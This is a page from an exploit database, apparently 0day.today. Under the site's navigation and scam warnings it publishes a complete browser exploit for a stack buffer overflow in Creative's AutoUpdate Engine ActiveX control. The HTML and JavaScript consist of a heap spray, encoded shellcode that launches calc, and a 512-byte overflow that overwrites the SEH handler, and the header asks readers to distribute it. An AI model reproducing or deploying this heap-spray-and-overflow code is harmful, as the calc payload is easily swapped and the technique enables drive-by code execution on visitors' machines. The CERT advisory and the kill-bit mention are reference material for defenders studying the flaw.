0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Creative Software AutoUpdate Engine ActiveX Stack Overflow Exploit
================================================================== Creative Software AutoUpdate Engine ActiveX Stack Overflow Exploit ================================================================== <html> <!-- !!!NOT PRIVATE PLEASE DISTRIBUTE!!! Zer0Day Creative Software AutoUpdate Engine ActiveX Stack-Overflow (CacheFolder) Exploit by BitKrush <BitKrush +A.T.+ G.M.A.I.L.D.0.T.C.0.M.> +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably. Original Advisory @ http://www.kb.cert.org/vuls/id/501843 and Vulnerability Discovered by Greg Linares of eEye Digital Security ActiveX Download @ http://www.creative.com/su/Product.asp MAXIMUM RESPECT TO RGOD (RIP) - A TRUE INSPIRATION Greetz to KCOPE, ELAZAR, H07, MATTEO, SHINNAI, AURIEMMA and to all the 2008 .CN/.RU/.JP/.* SQL INJECTORS - HAVE FUN WITH THIS YOU BASTARDS! +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Tested On Windows XP SP3 with all patches (like that matters) Products Affected: the below Creative Labs Software and Hardware depends on this ActiveX for updates and comes shipped with it or is supported by the control: Sound cards Audigy Audigy 2 Audigy 2 LS Audigy 2 NX Audigy 2 Platinum Audigy 2 Platinum eX Audigy 2 Value Audigy 2 ZS Audigy 2 ZS Gamer Audigy 2 ZS Notebook Audigy 2 ZS Platinum Audigy 2 ZS Platinum Pro Audigy 2 ZS Video Editor Audigy 4 Pro Audigy Gamer Audigy LS Audigy MP3+ Audigy Platinum Audigy Platinum eX Live! 24-bit Live! 24-bit External Live! 5.1 Live! 5.1 Digital (Dell) Live! ADVANCED MB MP3 + Sound Blaster Audigy 2 ZS Digital Audio Sound Blaster Audigy ADVANCED MB Sound Blaster X-Fi Fatal1ty Wireless Music X-Fi Elite Pro X-Fi Platinum X-Fi XtremeMusic USB Sound Blaster Audigy 2 NX MP3 + Portable Audio MuVo MuVo NX MuVo Slim MuVo TX MuVo TX FM MuVo? X-Trainer MuVo? MuVo? FM NOMAD II 32MB NOMAD II MG NOMAD IIc NOMAD Jukebox 3 NOMAD Jukebox ZEN Rhomba Portable Media Players ZEN Portable Media Center ZEN Vision 30GB MP3 Players MuVo MuVo 2.0 / MuVo Mix MuVo Micro MuVo NX MuVo Slim MuVo Sport C100 MuVo TX MuVo TX FM MuVo V200 MuVo? X-Trainer MuVo? MuVo? FM NOMAD II 32MB NOMAD II MG NOMAD II MG Limited Edition NOMAD IIc NOMAD JukeBox NOMAD Jukebox 10GB NOMAD Jukebox 2 NOMAD Jukebox 3 NOMAD Jukebox C NOMAD Jukebox ZEN NOMAD Jukebox ZEN NX NOMAD Jukebox ZEN USB 2.0 Rhomba ZEN 20GB ZEN Micro ZEN Nano 512MB ZEN Nano Plus ZEN Neeon 5GB/6GB ZEN Portable Media Center ZEN Sleek ZEN Touch ZEN Vision 30GB ZEN Xtra Web Cameras Creative PC-CAM 900 Creative WebCam Vista Game Star Live! Ultra for Notebooks PC-CAM 880 WebCam Instant WebCam Instant WebCam Live! WebCam Live! Pro WebCam Live! Ultra WebCam Notebook WebCam NX WebCam NX Pro WebCam NX Ultra WebCam Vista Video Audigy 2 ZS Video Editor Wireless Wireless Music Notebook Products Audigy 2 NX Audigy 2 ZS Notebook Live! 24-bit External Live! Ultra for Notebooks MP3 + WebCam Notebook Software Game Star http://us.creative.com/support/downloads/popup_supportproducts.asp Google: http://www.google.com/search?q=0A5FD7C5-A45C-49FC-ADB5-9952547D5715&btnG=Search +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ActiveX CLSID = 0A5FD7C5-A45C-49FC-ADB5-9952547D5715 KILL BIT THIS ^^ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ --> <object classid='clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715' id='obj1'></object> <script language='javascript'> var sc01 = unescape("%u9090%u9090"+ //Windows Execute Command (calc) "%ue8fcD%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+ "%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+ "%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+ "%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+ "%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+ "%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+ "%u685f%ufe98%u0e8a%uff57%u63e7%u6c61c"); var mainblk = unescape("%u0c0c%u0c0c"); var hdr = 20; var slck = hdr + sc01.length; while (mainblk.length < slck) mainblk += mainblk; var fillblk = mainblk.substring(0,slck); var blk = mainblk.substring(0,mainblk.length - slck); while (blk.length + slck < 0x40000) blk = blk + blk + fillblk; var memory = new Array(); for (i = 0; i < 400; i++){ memory[i] = blk + sc01 } var buf = ''; while (buf.length < 512) buf = buf + unescape("%09"); // TAB - 0x09 works best here. obj1.cachefolder = buf; </script> </html> # 0day.today [2024-12-23] #